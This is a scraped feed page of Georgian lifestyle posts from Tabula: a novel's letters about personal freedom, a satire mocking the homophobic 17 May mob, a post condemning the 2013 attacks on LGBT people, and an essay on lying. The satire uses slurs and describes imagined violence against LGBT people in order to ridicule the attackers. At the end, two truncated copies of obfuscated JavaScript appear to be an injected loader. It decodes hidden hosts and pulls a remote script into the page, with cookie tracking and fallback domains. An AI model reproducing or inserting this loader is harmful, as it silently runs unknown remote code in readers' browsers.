Quantcast
Channel: Tabula - ცხოვრება+სტილი
Viewing all 128 articles
Browse latest View live

წერილები საყვარელ გოგოს ფსიქიატრიულიდან (რომანი. ნაწილი IV. დასასრული)

$
0
0
Georgian

 წერილი მეცხრე: ფუკოს ქანქარას პრინციპი

   გწერ, ჩემო მეგობარო N, გწერ, რადგან მხოლოდ შენ შეგიძლია გაიზიარო ჩემი გულისტკივილი, გაიგო მისი მიზეზი. თუმცა, ისიც ვიცი, რომ შენ, მიუნხენის შემოდგომისგან მოოქრულ პარკში (,,Goldener Oktomber”) ზიხარ, სუსხითა და გამხმარი ფოთლების სურნელით გაბრუებული, კუნდერას მორიგ ტომს ფურცლავ და ჩვენი ყოველდღიური ყოფა ნაკლებად გაინტერესებს. ჩემო N, მაინც გწერ, რადგან მარტო ვარ...

   მოკლედ, ასეა თუ ისე, უღიმღამო ადამიანთა ზეიმია საქართველოში. რა გინდა, რომ ქნა? ან უნდა აქედან გაიქცე, ან თავადაც კოლექტივის ერთეულად იქცე... თუმცა, არსებობს მესამე გზაც... პროტესტი და უმრავლესობის დიქტატს კბილების ღჭენითა და მოთმინებით, უდრეკად და უხმოდ არ დამორჩილება – ყველა თავის გზას ირჩევს...

   რომ გაიმარჯვო და თავისუფალი გახდე, დიდი გზაა გასავლელი. ამ მოგზაურობაში, ალბათ, მთავარი ორი რამაა – სინდისის ტანჯვანი და განახლებისკენ სწრაფვა. ადამიანის მთავარი ნიჭი და მიზანი, როგორც გიო ამბობდა – განვითარებაშია... თუმცა, სინდისის წუხილისა და თავმდაბლობის გარეშე, არაფერი გამოგივა. ოღონდ მორჩილება არ უნდა იყოს მოჩვენებითი, მონური, მხოლოდ შენი ცოდნის, გამოცდილებისა და გადატანილი განსაცდელის სიმაღლის გადმოსახედიდან გაცნობიერებული თავმდაბლობაა ფასეული.

   სანამ ყოველივეში მხოლოდ საკუთარი თავს არ დაადანაშაულებ და არ იყვირებ, რომ შველა გჭირდება, არაფერი გამოგივა. ნებისმიერი სახის მონობის ტყვეობიდან გამოსვლა თავის დამდაბლებითა და ,,წყლულების“ გახსნით, მათი გულრწფელი გამომზეურებით იწყება. ასე ხორციელდება რეალურ ცხვორებაში ცნობილი სახარებისეული პრინციპი – ,,ითხოვეთ და მოგეცემათ”. თუ ეცდები ყველას ზემოდან უყურო, ასე ვერაფერს მიაღწევ – მონობას უფრო ღრმად ჩამარხავ და ბოღმისგან საბოლოოდ დაიღუპები. საკუთარი უძლურების აღიარება – ხსნის ერთადერთი გზაა! ეს აუცილებელი ეტაპია, მხოლოდ შემდეგ მოდის საკუთარ თავზე გამარჯვება.

   გახსოვდეს, შენში კიდევ უამრავი ,,მე“ დევს! გადახედე შენში არსებულ შეხედულებათა სისტემას, იმ ეტაპისთვის მორიგი კერპი უკუაგდე და გადადი უფრო მაღალი ხარისხის თავისუფლების სივრცეში, სადაც მორიგი კერპები გელოდება და ყველაფერი ისევ თავიდან...  ასე, ამ ,,მეების“ მოკვდინებით იზრდება პიროვნება. ეს მეტად მტკივნეული პროცესია, რომელსაც დიდი გულისტკივილი, საზოგადოებიდან გარიყვა, გაჭირვება და სასოწარკვეთამდე მძიმე მარტოობა სდევს თან... მე ,,მეც“ ვარ და ,,დათოც“, და კიდევ ბევრი, უამრავი ,,მეც“. დიახ, მე არა მხოლოდ დათო ვიყავი, არამედ LUCKY - იც, ამჟამად დემოც შევიქენი და ფუკოც გავხდი – ხან რაციონალური ჟანი ვარ და ხანაც შეშლილი მიშელი...

   ადამიანის ბუნება ისეთია, რომ მან ჯერ ყველაფერი, რისი გულისთვისაც ცხოვრება ღირს, უნდა დაკარგოს და ამ გზით გაიგოს ჭაშმარიტი თავისუფლების ფასი. ამის გარეშე, მხოლოდ წაკითხვით, მთავარი შიშის, სიკვდილის შიშის მეტნაკლები დაძლევა, და, ასე ყოველდღიური ყოფის წნეხისგან გათავისუფლება არ მოდის. თავისუფლება – ეს არის სიკვდილთან მაქსიმალური მიახლოება, რადგან ადამიანი ზუსტად და მკაფიოდ, მხოლოდ სიკვდილის პირას შეიგრძნობს, თუ რას ნიშნავს ,,ამაოება ამაოთა“ – წარმატება, სიმდიდრე თუ ულამაზესი ქალი, სხვა წვრილმანი ზრახვები და ,,დიდი“ წყენები – ,,ყოველივე ამაოა”... თუმცა, ზემოჩამოთვლილს არ უნდა შეუშინდე, რადგან დათმენის საზღაურიც დიდია – თავისუფლება მოგცემს იმ აბობოქრებული მდინარის ძალას, რომელიც კოლექტივიზმის კლდეს გააპობს!

   თავისუფლება არ არის ერთჯერადი, თუნდაც დიდი თავგანწირვის აქტი, არამედ ესაა პროცესი – ის  ჩაკირკიტებით შრომასა და ,,წვეთ-წვეთად საკუთარ თავში მონისგან გათავისუფლებას“ მოითხოვს.

   თავისუფლება, როგორც კოლექტივის უდაბნოში დაკარგულ მგზავრს, ისე უნდა გწყუროდეს. ის უნდა მოიპოვო ხანგრძლივი, მძიმე მოგზაურობით.

   თავისუფლება არ ითხოვს ჰიმნებსა და ორატორიებს, მას სჭირდება ნება, გამბედაობა და სიმტკიცე. 

   თავისუფლება არ არის ნაირფერადი ოცნებით ტკბობა, ესაა უახლოესი ადამიანების მიერ მოყენებული ტკივილის, დაცინვის, ტალახის უდრტვინველად ატანა.

   მაშ ასე, ადამიანის სიმდიდრე, მრავალფეროვნება და ინდივიდუალიზმი მის ცვალებადობაშია. ,,მეების“ მოკვდინებით იზრდება ადამიანი. ფუკოს ქანქარასავით უჩუმრად, ბევრი ყვირილის გარეშე, უნდა გადაიხარო და ქანაობა დაიწყო, ხოლო სიბრტყე რომელშიც შენ ირხევი, ნელა, მაგრამ განუხრელად დედამიწის ბრუნვის საწინააღმდეგო მიმართულებით – ავტორიტეტების, კოლექტივისა და მეგობართა ჩვეული წრის საპირისპირო უნდა იყოს. დაიღლები – შეისვენე, გინდ უკან დაიხიე – რხევათა ცენტრისკენ დაბრუნდი და მერე გააგრძელე, მაგრამ აუცილებლად გააგრძელე!.. თუ ბევრს და ხანგრძლივად იქანავებ, შეიძლება გაგიმართლოს – დროთა განმავლობაში ღერძთან დამაკავშირებელი ჯაჭვი გაცვდება, შემდეგ ის გაწყდება, შენ კი არწივივით ცაში აიჭრები და ჰაერში ილივლივებ...

   სანამ ნაირნაირი კოლექტივების ორბიტას საბოლოოდ მოწყდები, დიდი და მეტად მტკივნეული გზაა გასავლელი: მოკალი მორიგი მოძველებული ,,მე“ – მთავარია არ გაჩერდე და გულში მაინც, არ დააცხრო პროტესტი; განსაკუთრებით, პროტესტი საკუთარი არსებობის უაზრობისა და ეგოიზმის მიმართ, შემდეგ კი დაიხსენი თავი კოლექტივიზმის მარწუხებიდან.

   დაბოლოს! სიცრუისა და ფარისევლობის ოკეანეში, უნდა აანთო გულრწფელობის შუქურა, რომელიც განახებს გზას სიმართლისა... თუ შენ შეიყვარებ მარტოობასა და ყოველდღიურობის წნეხის მოწამეობას, თანამედროვე ადამიანები, პირველ ყოვლისა, თანამემამულეები, უახლოესი მეგობრები უდიდეს პატივს მოგაგებენ – შეშლილად გამოგაცხადებენ, შეგიძულებენ და გაგრიყავენ. ყოველივე ამის ჯილდო კი უმშვენიერესი იქნება – შენ გახდები ,,მარილი ამა სოფლისა“, შენ ,,დაატრიალებ დედამიწას“... და შეუერთდები მარადისობას.

 

P.S.

   ...მაგრამ არის კიდევ რაღაც უფრო დიდი და ძნელად მიღწევადი, ვიდრე ინდივიდუალიზმია... პიროვნების განვითარების ყველაზე მაღალი საფეხური, მისი ყველაზე დიდი მიღწევა ასეთია: თან იყო კაშკაშა, მკვეთრად გამოხატული ინდივიდი, ერთადერთი, განუმეორებელი და, იმავდროულად, ჩვეულებრივი, როგორც ყველა – ესაა ადამიანის განვითარების უდიდესი ხელოვნება და მწვერვალი! სწორედ  რიგითობასთან შერიგებასა და ჩვეულებრიობის განცდის შესისლხორცებაა ადამიანისთვის ყველაზე დიდი სირთულე, ასეთია ჩვენი რაობის აღქმის უდიდესი სიძნელე. სამაგიეროდ, მხოლოდ ამ გზით მიიღწევა ჭეშმარიტი  თავისუფლება და უმაღლესი სულიერი შვება!

   ყველაზე კარგო N, დასასრულს, სანამ დაგემშვიდობებოდე, შეგახსენებ უილიამ შექსპირის ცნობილ გამონათქვამს: ,,ყოველგვარ შეშლილობას აქვს თავისი ლოგიკა“... ასე რომ არაფერია საგანგაშო – მე კვლავ ფსიქიატრიულში ვწევარ და შენზე ვფიქრობ... ჩემო ოცნების გოგოვ, გკოცნი და გეფერები, მხოლოდ შენ!

ზურა ოდილავაძე. 2014 წელი    

 

 

 

 

 

CultureSocietyLifestyleწერილები საყვარელ გოგოს ფსიქიატრიულიდან (რომანი)მიშელ ფუკო

ქართველების ექვსი ვნება. თავი 1. მართალი ციალა (თანამედროვე პატერიკი)

$
0
0
Georgian

,,საბჭოურმა ტოტალიტარულმა სისტემამ ორი სახის ადამიანი და, შესაბამისად, ხელოვანი წარმოშვა: 1. ინდივიდი, რომელსაც უჩნდება სურვილი გარისკოს, დაძლიოს შიში, იწვნიოს იდეოლოგიური, მორალური თუ ფიზიკური წნეხი, გაუძლოს მას, გაიაზროს და ხელოვნებაში გამოხატოს ამ ტკივილისგან დაგროვილი, უნიკალური ემოციური გამოცდილება. ასეთი პიროვნება მარტოობისკენ მიისწრაფვის და ხდება თავისუფალი; 2. ინდივიდი, რომელსაც წნეხის ქვეშ ცხოვრებისგან გამოუმუშავდა წარმოუდგენელი შემგუებლობა და ვირთხის სიცოცხლიუნარიანობა. ასეთი ხელოვანი, უკეთეს შემთხვევაში, ქმნის ე.წ. ,,მასობრივ“, გასართობ კულტურას და დიდ პოპულარობასაც აღწევს. ის, პირიქით, კოლექტივს ეძებს და მასთან ერთობაში ჰპოვებს სიმშვიდეს, თუმცა ცდილობს ამ მასაზე გაბატონდეს. დაბოლოს, ტკივილის შედეგად გაჩენილი შემგუებელი პიროვნება-მუტანტი – ,,ძეხვის” ნარკომანია, გარემოებებისა და კოლექტიური შეხედულებების ტყვე“ – სიურრეალისტი გენადი.

 

.................................

ეპიზოდი:

,,ციალას ბრძოლა ,,პიდარასტებთან“

  

   17 მაისის აღლუმი მზადდებოდა...

 

   ჭეშმარიტ პატრიოტთა მთელი ძალები მობილიზებული იყო ერთი დიადი მიზნისთვის – უკანალის უბიწოების დაცვა! საიდუმლო ბაზაზე გაცხოველებული სამხედრო-საველე სწავლებები მიმდინარეობდა. პოლიგონზე, განცალკევებით, მეტად გაძლიერებული პროგრამით, გადამწყვეტი ბრძოლებისთვის სპეციალური მოიერიშე ჯგუფი –  ,,ტრაკფრთხილნი-777” წვრთნას გადიოდა...

  

   17 მაისის აპოკალიფსი მოახლოებულიყო!..

 

   ფეხზე იდგა სრულიად საქართველოს მართლმორწმუნე ეკლესიაც! მამაოების ტრიადები ,,ტაბურეტებით“ ,,სამბოს“ ილეთებს ხვეწდნენ, ფოლადის ჯავშანჟილეტებს ირგებდნენ, ზემოდან კამუფლაჟისთვის, რათა დროზე ადრე არ გამჟღავნებულიყვნენ, ძაძებში იმოსებოდნენ და ,,დედის ტრ...ს“ ორატორიას გალობდნენ. სტიქაროსნები, სტუდენტები და სხვა ნორჩი ჰომოფობნიც ფხიზლად იყვნენ და იქვე ჟრიამულით შეტაკებისთვის ემზადებოდნენ...

 

   ამხანაგებო, 17 მაისის პუტჩი იწყებოდა!..

 

   ქვეყანაში დიდი ფუსფუსი იყო ატეხილი: პოლიციის გაძლიერებული პატრულირება, ქუჩების გადაკეტვით, რათა გაძვალტყავებულ ,,ლგბტ“-ელთა 10- კაციან არმიას როგორმე პარლამენტის წინამდებარე პლაცდარმისკენ არ გაეღწია; სამხედრო-საჰაერო ძალები საყაზარმო მდგომარეობაზე გადაჰყავდათ, ჯავშანტექნიკა დაქოქილი იდგა...

   დიდი აჟიოტაჟი იყო პრესასა და ტელევიზიაშიც! ,,ჯაბრაილის“ თოქ-შოუში ერთდროულად მოძღვრებსა და ქალაქის სახელოვან ,,პუტანებს“ პატიჟებდნენ.

 

   მოკლედ, 17 მაისის წარღვნა კარს იყო მომდგარიი-ი-ი!

 

   ტრაკდაუცველი მოსახლეობა ლოცვად იდგა – მასები სისხლისმღვრელი ომისთვის სულიერად ემზადებოდნენ. ხაზინის ოქრომჭედლები ,,მეობისთვის ტრაკდამაშვრალთა“ საპატიო ორდენების მოვარაყებით იყვნენ დაკავებულნი.

   ამ დროს, ,,ლიბერასტები“ და სხვა ნაგვები მეტად ავისმომასწავებლად იყვნენ გაყურსული... ივერიის ცის კაბადონზე შავი ღრუბელი ჩამოწოლილიყო. დიდი განსაცდელის წინაშე იდგა სრულიად საქართველო... პრობლემა კი მხოლოდ ერთი უმნიშვნელო გარემოებით გამოიხატებოდა – ,,ლგბტ“-ეშნიკებს მშვიდად ეძინათ, ცისფერ სიზმრებს ხედავდნენ და გარყვნილების ზეობისა და არშემდგარი აღლუმის შესახებ არაფერს უწყოდნენ. თავდადებული პატრიოტები კი მაინც ცქვიტად იყვნენ – ფხიზლობდა ერი, არ ეძინა ბერს...

   ისმის კითხვა: ამ გარდამტეხ ჟამს, სად იყო და რას აკეთებდა მართალი ციალა? ის მშრომელთა მასებს გადამწყვეტი ბრძოლისთვის ამზადებდა და ცეცხლოვანი გამოსვლებით საომარ ჟინს აღვივებდა.

 

მართალი ციალას მოწოდება თანამემამულეებს!

 ,,ამხანაგებო, დანო და ძმანო, ივერიელნო, თქვენ მოგმართავთ მე – ორპირელი ციალა! გახარებთ, რომ 17 მაისს ტელეკომპანია ,,გოლგოთა TV”-ს პირდაპირი ეთერით ერი და ბერი ვიხილავთ დიდ დაპირისპირებას საქართველოში:

 ოჯახის სიწმინდისთვის მებრძოლები VS ლგბტ თემი, ლიბერასტები და სხვა ნაგვები!

 ჩვენი დიადი მიზანი ნათელია და კეთილშობილური! ჩვენ, რადაც არ უნდა დაგვიჯდეს, მოვალენი ვართ, დავიცვათ უმრავლესობის უფლებები, რათა მათ, ყოველგვარი დაბრკოლების გარეშე, განახორციელონ თავიანთი ლეგიტიმური ნდომა და ცემაში ამოხადონ სული სოდომისა და გომორის მოციქულებს! ამ გზით, ჩვენ არა მხოლოდ ოჯახს განვამტკიცებთ, არამედ მშობლებსაც სათანადო პატივს მივაგებთ!.. და ეს არ გახლავთ ამ ღონისძიებისგან მიღებული ყველა სარგებელი – ჩვენ ვაამებთ წინაპართა სულებს და მანანით ვაქეიფებთ მათ ზეციურ იერუსალიმში!

   ამას გარდა, გრანდიოზული მსვლელობის დასრულების შემდეგ, ,,ქართული ოჯახის სიწმინდის დამცველთა ლიგის“ (,,ქოსდალი“) ორგანიზებით, ,,დინამოს“ სტადიონზე გაიმართება საზეიმო კონცერტი. გალა წარმოდგენის პროგრამა მოიცავს:

   დასაწყისში დასავლეთ ტრიბუნასთან, სამთავრობო ლოჟის გასწვრივ საპატიო ნიშნით – ,,მეობითა და გაგებით ტრაკწაღებულნი“ დაჯილდოვდებიან ტრაკთდაცვეთას სასწაულებრივად გადარჩენილი მოქალაქეები. 

   მამათმავლობის პანდემიის თავიდან ასაცილებლად, პროფილაქტიკის მიზნით, დაჯილდოების რიტუალს მოჰყვება დამნაშავეთა მასობრივი დასჯა. წარმოდგენა გაიხსნება აღნიშნული არამზადების მამებისა და დედების სახალხო გაშოლტვით. თქვენ შესაძლებლობა მოგეცემათ, დატკბეთ 666 შარვალჩაწეული მამაკაცისა და კაბააწეული დედაკაცის ფუმფულა, ახლად გამომცხვარი ფუნთუშასავით მადისაღმძვრელი, გონების დაკარგვამდე ამგზნები, თეთრი, ქათქათა ტრაკებით, რომლებიც მათრახის გადაჭერასთან ერთად თქვენ თვალწინ, იდეალურად მრგვალ ფორმასა და თვალშისაცემ სიმკვრივეს შეიძენენ, ხოლო დასასრულს, ატამივით გავარდისფრდებიან... (შეამჩნევდით, ამ სახიფათო სენის შეფარული ფორმის არა მხოლოდ მამაკაცებში, არამედ დედაკაცებშიც კი გაჟონვას...).

   იქვე ეყრებიან მათი გარყვნილი შვილები, მოფრიალე შავი ბაირაღებით, ზედ მეწამული ფერის წარწერით: ,,ხარი ხართან დააბი, ან ფერს იცვლის, ან ზნესაო“. თქვენ იხილავთ დასაწვავად გამზადებულ 7 გაძვალტყავებულ მამათმავალს, სასოწარკვეთას მიცემულ 17 მეძავს, თითო-თითო ბისექსუალსა და ტრანსსექსუალს, სამ ლესბოსელსა და სხვა ერეტიკოსს... აგიზგიზდება ცეცხლი და მთელი ივერიის, მსოფლიოში ყველაზე მართალი მოსახლეობის თვალწინ, დაიწყება გარყვნილი სხეულების შებრაწვა, მათგან ტანჯული სულების გამოდევნა და, უკვე განსპეტაკებული სახით, ზეცად ამაღლება! ყოველივე წარიმართება ერთობლივი ლოცვის: ,,ანა-ბანა-ნიცა, რუსების ბალნი-ცა, ჰეი, გედევან-ჩო, ბა-ლან-ჩოს” – თანხლებით (უმორჩილესად გთხოვთ, ღვთის დახმარებით დაიზეპიროთ მოცემული ტექსტი!).

   საზეიმო საღამო დაიხურება წარმოდგენით, რომელიც გაიმართება სუპერთანამედროვე საცურაო ცენტრში – ,,პოსეიდონის სამყარო”. თქვენ იხილავთ ინგლისის ,,უსასთან“ ერთად დაძირვისა და ივერიის გაბრწყინების წარმტაც სცენებს. კონცერტის დასასრულს, აბობოქრებული აუზის ზედაპირიდან თავს ამაყად ამოყოფს ქართული სინქრონული ცურვის დედოფალი ბერტა ბაგრატიონი-ვერზბლჟიჟევსკა, რომელიც მოშიშვლებული მკერდით განასახიერებს ორ გადარჩენილ ბორცვს – ერთმორწმუნე რუსეთსა და გაბრწყინებულ ივერიას – ამინ და ვაშა!“.

   მქუხარე, ხანნგრძლივი აპლოდისმენტების დასრულების შემდეგ ციალა მკაცრ გამომტყველებას იღებდა და მრისხანე ხმით წარმოთქვამდა: ,,ღონისძიებაზე დასწრება ყველასთვის სავალდებულოა! არ მობრძანდებით და თქვენი აჯობებს...“

 

   მგზნებარე სიტყვის დასრულებისას ამჯერად, ალბათ, უფრო ციალა, ვიდრე ,,ციკო“ გულზე ხელს იდებდა და საყვარელ ,,ბანდერა როსას“ იწყებდა. მართალ მეომართა კოჰორტები ღამის წყვდიადში გალობდნენ და ფეხშეწყობით ფრონტის ხაზისკენ მიაბიჯებდნენ: ,,ავანტი პოპოლო, ალა რისკოსა, ბანდერა როსა, ბანდერა როსა...“.

   როგორც ხედავ, ჩემო ჯორდი, ,,პიდარასტებთან ომში“ ციალა ძირითადად ,,მეტაბურეტკეების“ იდეოლოგიური მხარდაჭერითა და დასავლეთის გარყვნილების მხილებით შემოიფარგლებოდა. შეიძლება ითქვას, ის ჯანსაღი ცხოვრების წესს უწევდა პროპაგანდას. ქალიშვილი უშუალოდ არ მონაწილეობდა ხელჩართულ ბრძოლებში, რადგან მასში ინტელექტუალ-ლიბერალი ჯერ კიდევ ცოცხლობდა და ძალადობრივი ქმედებების გზაზე აბრკოლებდა. ისიც უნდა ითქვას, რომ ბოლომდე მაინც ვერ მოითმინა და რუსთაველის გამზირიდან გაშმაგებულ ბრბოს გამოქცეულ ერთ-ორ მამათმავალს პუშკინის სკვერთან მაინც წამოეწია და დააწიწკნა თმა.

ზურა ოდილავაძე. 2016 წელი, თებერვალი

ReligionSocietyLifestyle17 მაისიჰომოფობია

კურთხეული სიძულვილის დღე

$
0
0
Georgian

2013 წლის 17 მაისს მეგობრებთან ერთად სრულიად დაუგეგმავად აღმოვჩნდი რუსთაველის გამზირზე. დავინტერესდით რომ გვენახა თუ რა ხდებოდა პარლამენტის წინ, ამიტომ გზას ფეხით გავუწყევით. გზადაგზა რამდენიმე მოწყენილი, გაბრაზებული და შეურაცხყოფილი ბიჭი შეგვხვდა და მივხვდით, რომ ჰომოფობიასთან ბრძოლა ჰომოფობების სახელით ბრძოლაში გადაზრდილიყო. მალე რუსთაველზე ჩავედით.

ნანახმა მოლოდინს გადააჭარბა.

ვნახეთ შავებში ჩაცმული წვერიანი სამღვდელოება, რომლებიც ხან ხალხს დასდევდნენ, ხან მათთან ერთად დარბოდნენ. ვნახეთ ახალგაზრდა ბიჭები, რომლებიც შეშლილი სახეებით, ყვირილითა და გინებით, ქვებითა და ჯოხებით ხელში, შემოხეული მაისურებით იმ მიმართულებით მირბოდნენ, საიდანაც მათ დაუძახებდნენ: "აქეთ არიან, მოდით!". ვნახეთ ქალები, რომლებიც, იმისდა მიუხედავად, რომ დედები, დები და შვილები იყვნენ, მზად იყვნენ, რომ სხვისი შვილები სიკვდილისთვის გაემეტებინათ. ვნახეთ ბავშვები, რომლებსაც ძალადობას ოჯახში ასწავლიდნენ და რომლებიც ბრმად ენდობოდნენ მშობლებს. ბავშვები, რომლებსაც უთხრეს, რომ ყველა განსხვავებულ ადამიანს ქვა უნდა ესროლო. და ისინიც ისროდნენ. 

ამ დღეს შავი ფერი, დამცინავი, გაყინული, გაბოროტებული სახე და ბევრი ძალადობა ვნახეთ. ვნახეთ, რომ ფერადი, მხიარული და ბედნიერი დღესასწაული, რომელიც ზიზღსა და ბოროტებას, დამცირებასა და ტკივილს, უთანასწორობასა და სიძულვილს ებრძოდა სწორედ რომ ამ ყველაფრის ზეიმად ქცეულიყო. ყველაზე უცნაური და გასაოცარი კი ის იყო, რომ ხალხისთვის ეს ყველაფერი ნორმალური იყო. ვერაფერს ხედავდნენ ამ ყველაფერში საგანგაშოს. ვერაფერს ხედავდნენ ისეთს, რაც მათ შინაგან მეს ეწინააღმდეგებოდა.ვერაფერს ხედავდნენ ისეთს, რაც მათ მორალს ეწინააღმდეგებოდა. ვერაფერს ხედავდნენ ისეთს, რაც მათ ქრისტიანულ მოძღვრებას ეწინააღმდეგებოდა და რაც , პირველ რიგში, ქრისტეს ეწინააღმდეგებოდა. 

2014 წელს კი საქართველოს პატრიარქმა ეს დღე ოჯახის სიწმინდის დღედ აქცია. ამ დღის შემდეგ კი ჩვენთან ყოველწლიურად აღინიშნება ჰომოფობიის, ტრანსფობიის, რელიგიური ფანატიზმის, სიძულვილის, არასწორი ქრისტიანობის, არასწორი მორწმუნეობის, არასწორი აღზრდის, არასწორი განვითარების, გაუნათლებლობის, ბოროტების, განსხვავებულთა ჩაგვრის, სამღვდელოების ძალადობის, მოძადალეების დაუსჯელობის, უსუსური ხელისუფლებისა და "ტაბურეტკის"დღე. 

გილოცავთ მეგობრებო (დაგვიანებით) ოჯახის სიწმინდის დღეს!

SocietyLifestyleმრევლისაზოგადოებაეკლესია17 მაისილგბტლგბტ აქციაჰომოსექსუალობაჰომოფობიატრანსფობია

ტყუილი, როგორც ურთიერთობის წერტილი

$
0
0
Georgian

ცხოვრებაში უამრავი ადამიანის წინ ათიათასჯერ და ხშირად უფრო მეტჯერ, გვიწევს საკუთარ ცხოვრებაზე მონოლოგის წაკითხვა, რაღაცის ახსნა-განმარტება, უფრო მეტის მოყოლა. დგება მომენტები, როცა გარშემომყოფები სვამენ კითხვებს, რომლებსაც პასუხები სჭირდება. ჩვენი სურვილის საწინააღმდეგოდ, ინდივიდები ჩვენს გარშემო იკრიბებიან და დარჩენილი ცხოვრების შემადგენელი, განუყოფელი ნაწილები ხდებიან.  ეს ყველაფერი ისე ხდება, ვერც კი ვიაზრებთ, ვერც კი ვხვდებით, ჩვეულებრივ ყოველდღიურობაში როგორ გადადის.

როცა ურთიერთობა იწყება, არასოდეს არავინ ფიქრობს შესაძლო მომავალზე. ყველაზე რთული, რაც ასეთ დროს არსებობს, პასუხისმგებლობაა. სხვების წარმოდგენა ახალ ურთიერთობასა და შემდეგ განვითარებაზე.

ჩვენთან მოდიან ადამიანები და აჩენენ  ბევრ შეკითხვას. როცა უკან მოუხედავად მიდიან, ტოვებენ ძალიან, ძალიან ბევრ პრობლემას. მერე უკვე ეს პრობლემები ჩვენშია, ჩვენია, ჩვენი ნაწილი, ჩვენი ყოველდღიურობა.

ურთიერთობებში ყველაზე მეტად ტყუილი მაშინებს. მაცდურმა ევა რომ მოატყუა, ევამ – ადამი, მერე ორივემ, ერთად თუ ცალ-ცალკე, უფლის მოტყუებაც სცადა. თუ თქვენ ოდესმე ვინმე დაგპირდათ, რომ არასდროს მოგატყუებდა, ესე იგი, თქვენ უკვე მოგატყუათ. იმიტომ რომ ტყუილი ნორმაა, ჩვენ ყველა ვიტყუებით.  გვაიძულებენ, რომ მოვიტყუოთ, ამაზე დგას ურთიერთობები, ცხოვრება, მასა, ხალხი, ბრბო.

სამყაროში ყველაზე მეტად ტყუილების შემდეგი ახსნა–განმარტებები მძულს. ასეთ დროს თავი მთელი დედამიწის ზურგზე ყველაზე საცოდავი არსება მგონია. თუ სცადა ჩემთვის ერთი ხელის მოსმით ცხოვრება დანგრია, მერე მოვიდა და მეუბნება, რომ არ იყო მართალი, შეცდომა განზრახ დაუშვა , უნდა ვაპატიო?

ესეც ტყუილია. არ შეიძლება ინანო ის, რაც ერთ დროს, თუნდაც წამიერად, მთელი არსებით გინდოდა.

ყველაფერი მთავრდება ოდესღაც: ერთი sms-ით, ხანგრძლივი საუბრით კაფეში ან სატელოფონო საუბრისას… ბევრ ჩვენგანს უთქვამს "ბოდიში"ან უთხოვია პატიება. ამ ყველაფრის შემდეგ, როგორც წესი, ან ბევრს ლაპარაკობენ, ან საერთოდ არ ლაპარაკობენ, მაგრამ რაღაც ხდება: ვიღაც ნაწყენია, ვიღაც დათრგუნული, ვიღაც ცუდ ადამიანად გრძნობს თავს, ვიღაც თავისუფლად და სიახლეებს ელის. ჩვენ მხოლოდ ერთი გვავიწყდება, რომ როცა ვიწყებდით ურთიერთობას,  ვიცოდით, რომ იგი ოდესღაც დამთავრდებოდა… ერთი sms-ით, ხანგრძლივი საუბრით კაფეში, ან სატელოფონო საუბრისას… მაგრამ ჩვენ დავთანხმდით ამაზე,  რაღაც დროის განმავლობაში თავი მარტოსულად რომ არ გვეგრძნო და  გვეფიქრა, ვიღაცას ვუყვარვართ, ვიღაცას ვჭირდებით და ვუნდივართ.

ამაში ახალი არაფერი არ არის.

ნუთუ ვერ გრძნობენ ადამიანები, ნუთუ ვერ ხვდებიან, რომ  ტყუილი დასასრულისკენ გადადგმული პირველი ნაბიჯია?

მე ასე არავის ვექცევი. ამიტომაც თავი რომელიღაც წიგნის პერსონაჟი მგონია. მაგრამ ეს ჩემი პრობლემაა და არ მაქვს უფლება, ვინმეს თავს მოვახვიო. სხვა თუ არაფერი, მე საკუთარ თავთან ყოველთვის მართალი ვარ და ეს კარგიც კია.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tabula.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
// ]]>

